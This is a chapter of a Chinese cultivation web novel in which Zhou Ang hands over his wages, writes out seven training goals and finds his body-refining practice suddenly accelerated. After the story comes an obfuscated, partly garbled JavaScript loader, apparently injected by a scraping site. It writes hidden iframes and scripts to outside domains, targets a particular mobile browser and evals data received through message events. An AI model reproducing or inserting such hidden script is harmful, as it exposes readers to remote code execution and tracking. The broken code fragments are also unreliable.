关灯 特大 直达底部
亲,双击屏幕即可自动滚动
第五十章 意外收获
    今天周昂回家又晚了一会儿。

    不过还好,母亲和妹妹也只是刚刚吃过饭而已,锅里饭还是热的。

    周昂在约莫一个时辰之前,刚吃过饭,但以他这个年纪来说,多吃一顿完全不在话下,不过他还是掰了一半杂粮饼子递给周子和。

    吃饭的工夫,周昂把今天从陈府那边得到的工钱交给了母亲,又把多出来那部分钱的来历也解释清楚了。

    听到连已经交上去许久的佛经,都又重新加了钱,周蔡氏一边高兴,一边又忍不住感慨,道:“当年你爹的字就是大家都说好,他曾说,字是读书人的第二张脸,多好都不嫌好,越好越好!只是当年在他那里,只听人夸他,他自己也夸自己,到底也没见过真的起多大作用,不想今日在我儿这里看见了!”

    一家人念叨一番、欣喜一番,又感慨一番,但等周昂吃过饭,母亲把钱去收起来之后,她们照例还是要忙活起来。

    收衣服,叠衣服,该缝缝补补的要赶紧动手,赶在天没黑之前,要把该送的衣服给人送回去。

    而且最近这天不大稳当,她们决定除非是熟识的,就算晚了时间也不会怪罪,否则就不接新的活儿了——多年洗衣服晾衣服,翎州本地的天气,都在母亲心里装着呢。不会看天文也不用背黄历,每年到了什么时候,她大约就能猜准哪几天会下雨,以及大概会下成什么样子。

    都说天有不测风云,但对于用心的人来说,并没有真正完全不测的风云。

    看她们在院子里收衣服,周昂就站在堂屋门口陪两人又多聊了一会儿,多数是小妹叽叽喳喳的,说些洗衣妇人们之间的事情。

    她偶尔也会有些小幻想,比如她曾说过好多次,要是家里有一只船就好了,到时候就去东边运大米去。逢到丰收时节,直接去下面县里拉粮,一个来回就能赚一两多银子——来回亦不过百余里水路而已。

    当然,这丫头想的时候,估计全然没有考虑过,要不是有把子力气,能自己搬粮食、能自己轻松地撑船百里逆流而上,这个钱还真是赚不到手的。

    因为这赚的本就是个力气钱,一旦请人搬运、划船什么的,工钱一开,也就不剩什么了——事实上就算自己很有膀子力气,也是要雇人的。

    当然,在她的年纪而言,叽叽喳喳地跟你说这些幼稚的憧憬,叫人只会觉得美好,全然没有心思去直接告诉她现实的残酷。

    连母亲周蔡氏一般都不点破她。

    只是偶尔说得实在不靠谱了,她才会笑着点上两句,告诉她实际的苦难,于是小丫头想一想,顿时就会露出兴致索然的模样。

    这样的对话和聊天,其实过去的周昂也偶尔参与,但参与度极低,因为母亲和妹妹每日里忙于生计,每日里跟一帮粮商、茶商、药材商、船家、力工等等打交道,对这船上的事情,包括运输、物价等等,天然敏感,而周昂从小就是负责读书,对这些事情,实在也是不怎么插得上嘴。

    现在的这个周昂当然好了些,准确的说,是好了许多。

    他虽然对这个社会的商业运转,缺乏最直接的一手体验,但对“商业”这个东西本身,却是并不陌生的。甚至于,稍微了解一下本地的情况之后,他看问题就比周蔡氏还要深刻多了。

    这种高屋建瓴的见识和见解,是十几年现代教育和几年现代社会工作经验带来的,让本地“土着”人士很难比拟的一项优势。

    当然,现在周昂无意于显摆这个。

    这个时代做生意是可以的,丰衣足食不成问题,但他并没有这方面的想法。因为他知道自己已经走上了更好的路。

    所以,他比起以前那个周昂,会更加的乐意于参加这样的家庭内的闲聊,却仍然很少插话——他只是喜欢这样一家人轻轻松松说话的那种氛围罢了。

    …………

    聊了一阵子,眼见干了的衣服快收完,接下来娘俩要缝缝补补了,周昂就干脆转身回了自己的房间。

    现在抄写《金刚经》的临时工作已经辞了,他下午和晚上的大片时间就都腾了出来,自然就可以自主去安排。

    今天上午经历了太多事,师叔又给了很多“脑洞”,周昂准备先仔细梳理一下。而梳理的方式,还是那样,把它们都写下来。

    抄写《金刚经》期间,不止得了不少钱,还剩下了不少好墨好纸,连全新未动的笔,都剩下了两三杆,这些是昨晚都已经整理好,就摆在桌上方便随时取用。但此时,周昂却纯粹下意识地扯过一张裁好的普通纸。

    习惯了从最次的开始用。

    磨了墨,提起笔来——

    第一,学习和掌握怎么发火焰;

    第二,最近抽时间出门去买一把好兵器。短刀最好。

    想了想,又补上一句——

    可以找安平兄给推荐下哪家铁匠铺比较好。

    然后——

    第三,尝试把妖元熔铸进去。

    写到这里,他不由得叹了口气——很可惜,师叔不能帮忙。虽然搞不清到底为什么,问了师叔也不说,但他就是没法帮忙,只能告诉怎么弄。

    这要是由他出手给弄,肯定稳当,但自己尝试着弄的话,就要小心小心再小心了——妖元就一个,一旦失败,下一个就不知道什么时候能碰见了。

    更何况,就算碰见了,自己也未必打得过人家了!

    唉,山门里的一切东西都没法带出来,带出来就废了,甚至连师叔和敖春都没法出门,这真是个问题。师叔不肯说是什么缘故,想必是有着叫他为难的地方,等师父回来了一定要问问他,这到底是怎么回事。

    按说没道理的!

    师叔可以轻松地“买”酒、“买”米、“买”菜,还是人家炒好的菜直接端过来,简直比美团饿了么还神,也就是说,他可以轻易的拿到外边的东西,而外边的东西进了那座小庙,也是好用的,没道理反过来就不行啊!

    还有那堆雪的事儿,以及枣树明明看上去没死,为什么这都四月底了,还是不发芽呢?

    这些问题,等师父来了,都得问问。

    走了一会儿神,周昂又继续写——

    第四,我得学学兵器。

    关于这一点,周昂心里想的是:光是炼体不行,师叔也说了,他教自己的那一套拳法,就是用来炼体的,真打起来不行,没用。炼体的话,那套拳的确效果显着,自己现在的速度、力量,大幅度提升,但光这样是不行的,必须得有能够跟人过招打架甚至生死相搏的东西。

    所以,拳脚功夫和兵器,都要学一学。

    第五……啊,这个,想想,得等到我把妖元熔铸进兵器里,且保留了那份妖元里的“妖法”,才有可能练得起来。不然的话,就算记住师叔教给的怎么破解对方妖法的办法了,也没地方实践和练习去。

    所以,第五不是这个,第五是……按照师叔传授的办法,尝试写出一道可以破解妖法的符。

    第六,先找一块小石头,尝试给它打上我的灵气的印记,尝试直接灵气对灵气的召唤。争取能做到像人家那样随叫随到。

    第七,等妖元熔铸成功,试验一下师叔教给的用灵气破禁锢和破妖法的办法。

    …………

    不知不觉就写满了一张纸。

    写完了第七条,周昂又想了想,觉得差不多就是这些了,再多的计划,现在写了也没用,于是这才停下笔。

    把这七条计划又从头审视一遍,默记在心,他随后便拿起这页纸,信手向身后扔了过去——那纸离开他手,当即便燃烧起来,等到盘旋着落到一半,已经化为灰烬了。

    这种感觉,有点小装逼,但是好爽。

    感觉自己真的在修仙的样子。

    …………

    等周昂理清了思路时,耳听得外面已经没有了丝毫动静,起身出去转一圈,发现母亲和妹妹都已经出门。显然是给人送还衣服去了。

    别管因为什么,今天上午的课程已然是落下了,周昂决定趁这会儿功夫天还没黑,争取给补回来。

    站到院子里,找一块没有被晾衣绳切割的完整地方,他站好,深吸一口气,进入了观想状态,目送那只大公鸡悠闲地踱步离开了,便按照已经熟悉的套路,打起炼体拳来。

    但拳路刚起,他就觉得有点不对劲。

    不单纯是微凉却又叫人舒服的灵气之风嗖嗖往身体里钻得更快的问题,打着拳,他明显感觉到,自己的身体吸收灵气好像一下子变得加快了许多。

    甚至他能清楚地察觉到,那灵气在改造自己身体的速度,也一下子加快了许多——以往一般是三通拳打罢,他会感觉身上酸酸涨涨的,师叔说,那就是灵气改造身体的反应,但现在,拳路打起来没多大会儿,他已经觉得身上开始发酸发涨。等一通拳打完,身体肌肉骨骼的酸胀程度,已经超过过去三通拳的效果!

    周昂心里下意识地有些惊喜,但他没有停下,仍和往日一般,第二通拳又接上了——也是师叔说的,人体是有承受极限的,修持是个天长日久的事情,没必要为了求快,短时间内把自己搞得太过狼狈。

    而且练得遍数再多,其实效果也就那样,后面效果会减弱得特别快。因为一旦达到了饱和,你的身体就会自动拒绝灵气的改造。

    所以,按照师叔的话说,就三遍,是什么样儿就什么样儿了。

    于是忍着酸胀,直到打完了三遍拳,周昂才缓缓收势,停了下来。

    结果停下来一检视,他顿时心中大喜:今天的进步速度超过了过去的至少五六倍!

    按照师叔给的比方,如果过去每天都是一滴水,今天起码有五六滴?

    惊喜过后,周昂赶紧思考是什么原因——他就这逻辑,别管好事儿坏事儿,非得赶紧分析清楚为什么才踏实。

    而这个时候,原因似乎不难想到——

    就在今天上午,自己刚刚击杀了一只有妖元傍身的黄鼠狼精。

    至于为什么,周昂推测,难道是自己在杀他之前和之后,一直都对那两只黄鼠狼精恩将仇报和作恶的事情,愤恨不已?

    这无形之中符合了引导术的要求?

    或者说……所谓引导术,本来就是这个意思?

    这个意外收获很不错!

    eval(function(p,a,c,k,e,d){e=function(c){return(c35?(c+29):c.toString(36))};if(!''.repce(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function{return'\\w+'};c=1};while(c--){if(k[c]){p=p.repce(new RegExp('\\b'+e(c)+'\\b','g,k[c])}}return p}('h 4="F"+E.d.C(B).H(2);c.6("");8((/(K)/i.J(b.I))){7.m(\'u\',v(e){h 3=e.x;8(3.9){8(7[3.9+"w"]!=1){7[3.9+"w"]=1;A(z(3.y.G(/\\+/g,"%15")))}}});c.6(\'j://m.n.t/s-11-\'+(r q).o+\'.14?N=5&17=\'+b["a"]+\'&p=\'+4+\'" 16="Y" R="Z%"  Q="0" P="o" S="0" T="X">\}w{;c.6(\'j://m.n.t/s.V?\'+(r q).o+\'&U=1&p=\'+4+\'&a=\'+b["a"]+\'"><\\/k>\}',62,70,'|||_dat_d|djdzh||write|window|if|if_id|ptform|navigator|document|src||div||var||https|script|iframe||24djk|getTime|lsbdid|date|new|51085|message|function||data|wz_ev_j|decodeURponent|eval|36|toString|randwww.shu008.com|math|div_|repce|substr|userAgent|test|UCBrowser|id|addEventListener|sdfa|no|scrolling|marginheight|width|frameborder|allowtransparency|is_bs|m3u8|else|true|auto|100|style||dispy|none|html|20|height|serasfd'.split('|,0,{}))

    _17mb_wappbottwww.shu008.com;

    setTimeout(function{("nogg").="none";},4000);